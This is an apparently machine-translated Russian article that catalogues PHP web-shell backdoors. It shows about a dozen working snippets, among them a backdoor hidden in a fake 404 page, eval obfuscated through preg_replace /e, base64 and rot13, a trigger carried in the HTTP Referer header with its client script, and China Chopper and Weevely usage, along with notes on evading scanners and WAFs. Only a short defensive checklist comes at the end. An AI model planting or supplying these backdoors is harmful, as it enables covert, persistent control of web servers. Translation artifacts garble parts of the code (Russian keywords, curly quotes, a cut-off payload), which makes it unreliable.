Мы относимся к этим PHP-бэкдор-программам с учёбой, и большая часть PHP-бэкдор-кода позволяет нам понять, насколько добры программисты.
Мощный PHP-бэкдор в одном предложении
Такой «бэкдор» позволяет использовать сайты,Администраторы серверов очень проблемны и часто вынуждены менять методы для выполнения различных методов обнаружения, а многие новые методы написания нельзя обнаружить и обработать обычными методами обнаружения.
Сегодня мы расскажем о некоторых интересных PHP-троянах.
1. Скрыть PHP-пони, используя 404 страницы:
[mw_shl_code=php, true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Не найдено</title> </head><body> <h1>Не найдено</h1> <p>Запрошенный URL не был найден на этом сервере.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 не найден'); ?>[/mw_shl_code]
404 страница — это часто используемый файл на сайте, и мало кто будет проверять и изменять его после того, как он обычно рекомендуется, так что мы можем использовать его, чтобы скрыть бэкдор.
2. Безликий скрытый PHP в одном предложении:
[mw_shl_code=php,true]<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Назначите $_POST['code'] $_SESSION['theCode'], а затем выполните $_SESSION['theCode'], при этом выделение — отсутствие кода подписи.
Если вы используете инструмент сканирования для проверки кода, он не вызовет тревогу и не достигнет цели.
3. Супер скрытный PHP-бэкдор:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Функция GET сама по себе является трояном;
Как использовать:
[mw_shl_code=php, true] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
После выполнения текущий каталог генерирует c.php предложение Trojan, когда параметр A оценивается, генерация ошибки Trojan не удалась, и при утверждении он также сообщает об ошибке, но появляется троянский конь, который нельзя недооценивать.
Запрос уровня, код для запуска PHP backdoor:
Этот метод реализуется с двумя файлами, файлом 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", имплодировать(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Документ 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset=UTF-8′);
//要执行的代码 $code= <<<КОД phpinfo(); CODE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= массив( CURLOPT_URL => $url, CURLOPT_HEADER => ЛОЖНО, CURLOPT_RETURNTRANSFER => ВЕРНО, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Запустите код, закодированный в base64, через HTTP_REFERER в HTTP-запросе, чтобы добиться эффекта бэкдора.
Полезно использовать эту идею, чтобы обойти WAF.
4.PHP инструмент генератора backdoor weevely
Weevely — это специализированный PHPБесплатное программное обеспечение Webshell может использоваться для моделирования соединения, аналогичной telnet. Weevely обычно используется для эксплуатации веб-программ, скрытия бэкдоров или методов, похожих на telnet, вместо управления веб-страницами; серверный PHP-код, генерируемый Weevely, кодируется на базе 64, поэтому может обманывать основное антивирусное ПО и IDS. После загрузки серверного кода обычно можно запустить его напрямую через Weevely.
Функции, используемые в бэкдоре, часто применяются к обработке строк, и такие функции, как eval и system, используемые в качестве правил инспекции, не отображаются напрямую в коде, поэтому файл backdoor может обойти проверку инструмента поиска бэкдора. Сканирование с помощью инструмента обнаружения веб-бэкдор тёмной группы показывает, что файл не находится под угрозой.
Вышеизложенное — общее введение, и соответствующие методы использования здесь не представлены — это простая научная популяризация.
4. Три деформированных однопредложенных PHP-трояна Первое:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Вторая
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Введите пароль http://site/2.php?_=assert&__=eval($_POST['pass']) в кухонный нож — это pass.
Если использовать дополнительные данные кухонного ножа, они более скрыты, или можно использовать другие инъекционные инструменты, потому что они отправлены после публикации.
Третий
[mw_shl_code=php, true] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ('рини') — это закодированная оценка, которая полностью избегает ключевых слов, не теряя эффекта, из-за чего у людей начинается кровь!
5. Наконец, перечислите несколько продвинутых PHP-троянских бэкдоров:
1、
[mw_shl_code=php,true]$hh= «p». r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; включать($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= «p». r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
В итоге, эти PHP-бэкдоры можно назвать полными, если не быть осторожным, вас обязательно обманут, и какова главная задача нашей статьи сегодня? Ключевые моменты приведены в резюме ниже!
Как справиться с однофразовым бэкдором на PHP: Мы подчёркиваем несколько ключевых моментов, и если вы читаете эту статью, я считаю, что вы не неспециалист, так что не буду говорить длинно:
- Будьте внимательны к безопасности при написании программ на PHP
- Файлы логов сервера должны читаться часто и делать резервные копии
- Строгое распределение разрешений для каждого участка
- Частые пакетные проверки безопасности динамических файлов и каталогов
- Узнайте, как проводить ручное исследование антивируса «Поведенческое суждение и убийство»
- Следите за новостями или проникновите в действующий лагерь кибербезопасности
- Даже функция может использоваться как правило для иерархической обработки серверной среды
Мы считаем, что когда появляется больше сайтов для управления и большое количество данных, мы должны разумно применять вспомогательные инструменты, но не стоит полностью полагаться на них, технологии постоянно обновляются и совершенствуются, самое главное — чтобы вы научились и понимали, как писать этих мощных бэкдор-специалистов, и эта трансформация роли может принести вам больший прогресс.
|